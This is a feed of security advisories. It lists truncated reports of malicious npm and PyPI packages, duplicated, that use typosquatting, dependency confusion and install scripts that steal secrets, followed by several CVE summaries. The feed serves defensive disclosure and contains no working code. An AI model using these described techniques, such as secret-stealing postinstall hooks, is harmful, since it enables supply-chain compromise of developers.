Malicious code in params-valid-js (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 397af72237ba3626ac4727497662530f602c2ce6ec71406f48b508055687366c The package presents itself as 'Simplified HTTP request client' and copies identity metadata from Mikeal Rogers' legitimate request package bugs URL...

MAL-2026-5988 Malicious code in params-valid-js (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 397af72237ba3626ac4727497662530f602c2ce6ec71406f48b508055687366c The package presents itself as 'Simplified HTTP request client' and copies identity metadata from Mikeal Rogers' legitimate request package bugs URL...

Malicious code in tobihook (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2c093ec7049ebbe26ca860033bc1fd81ad98f4f586b66fc68170e1ff81ae90bb The package masquerades as an HTTP helper functions named post/get/fetch, module comment ' request/init.py', and an unused requests dependency but ea...

MAL-2026-5995 Malicious code in tobihook (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2c093ec7049ebbe26ca860033bc1fd81ad98f4f586b66fc68170e1ff81ae90bb The package masquerades as an HTTP helper functions named post/get/fetch, module comment ' request/init.py', and an unused requests dependency but ea...

Malicious code in ogd-analytics (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1df5f4bdd6e2f58ff581cbad0d01738b5f6464794ace1a9fa95eea061a5bb7d5 package.json declares a preinstall lifecycle script that runs automatically during npm install. The script executes hostname, whoami, and pwd, then...

MAL-2026-5987 Malicious code in ogd-analytics (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1df5f4bdd6e2f58ff581cbad0d01738b5f6464794ace1a9fa95eea061a5bb7d5 package.json declares a preinstall lifecycle script that runs automatically during npm install. The script executes hostname, whoami, and pwd, then...

Malicious code in classbreeze-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e19daf4f946816f5ba3c6e592eacc980861b281c6752b738de57fdd31f49279d The package masquerades as a Tailwind plugin: README and the top of src/index.js are a verbatim clone of @tailwindcss/typography...

MAL-2026-5973 Malicious code in classbreeze-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e19daf4f946816f5ba3c6e592eacc980861b281c6752b738de57fdd31f49279d The package masquerades as a Tailwind plugin: README and the top of src/index.js are a verbatim clone of @tailwindcss/typography...

Malicious code in easy-day-js (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8602a5a154b50bb6351900a08fa45d7814c0f152e4379dcae53ccfa0b83db891 Package name 'easy-day-js' impersonates the popular 'dayjs' library, copying dayjs's author 'iamkun', homepage https://day.js.org, repository URL,...

MAL-2026-5979 Malicious code in easy-day-js (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8602a5a154b50bb6351900a08fa45d7814c0f152e4379dcae53ccfa0b83db891 Package name 'easy-day-js' impersonates the popular 'dayjs' library, copying dayjs's author 'iamkun', homepage https://day.js.org, repository URL,...

Malicious code in cryptodao-contracts (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 21c450a1d14c10213b83137f9c0670a9d8ed953105f96d66eedee78a56479d82 Package is published as version 99.99.99 to win private-vs-public resolution against an internal cryptodao-contracts namespace. The package's main...

MAL-2026-5975 Malicious code in cryptodao-contracts (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 21c450a1d14c10213b83137f9c0670a9d8ed953105f96d66eedee78a56479d82 Package is published as version 99.99.99 to win private-vs-public resolution against an internal cryptodao-contracts namespace. The package's main...

Malicious code in cryptodao-types (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 39fca1d76ba65e01fbd3319d6752bb0dc896f9cc356676c6bfad3671d8b1e0d9 On npm install, the package's postinstall script recon.js harvests installer-side secrets and POSTs them to attacker-controlled webhook endpoints. Th...

MAL-2026-5970 Malicious code in cryptodao-types (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 39fca1d76ba65e01fbd3319d6752bb0dc896f9cc356676c6bfad3671d8b1e0d9 On npm install, the package's postinstall script recon.js harvests installer-side secrets and POSTs them to attacker-controlled webhook endpoints. Th...

Malicious code in cryptodao-sdk (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 03ac58e81310f19b32d136445eab91f7ddc776921ff8dfd08bdb91bcdd4a1da6 [email protected] ships a postinstall script recon.js that runs automatically on npm install and harvests installer-side secrets. The script...

MAL-2026-5969 Malicious code in cryptodao-sdk (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 03ac58e81310f19b32d136445eab91f7ddc776921ff8dfd08bdb91bcdd4a1da6 [email protected] ships a postinstall script recon.js that runs automatically on npm install and harvests installer-side secrets. The script...

SUSE CVE-2026-24895

FrankenPHP is a modern application server for PHP. Prior to 1.11.2, FrankenPHP's CGI path splitting logic improperly handles Unicode characters during case conversion. The logic computes the split index for finding .php on a lowercased copy of the request path but applies that byte index to the...

SUSE CVE-2026-42257

Net::IMAP implements Internet Message Access Protocol IMAP client functionality in Ruby. Prior to versions 0.4.24, 0.5.14, and 0.6.4, several Net::IMAP commands accept a raw string argument that is sent to the server without validation or escaping. If this string is derived from user-controlled...

CVE-2026-53441

A flaw was found in Jenkins. This vulnerability, a stored cross-site scripting XSS issue, allows attackers with Agent/Configure permission to inject malicious scripts into the user-provided description of a generic offline cause. When other users view this description, the injected script can...

PT-2026-50429

When NGINX Plus is configured as the data plane for NGINX Gateway Fabric, an injection vulnerability exists in the NGINX configuration generator component of NGINX Gateway Fabric. User-supplied string values from the NginxProxy Custom Resource Definition serverTokens field and the...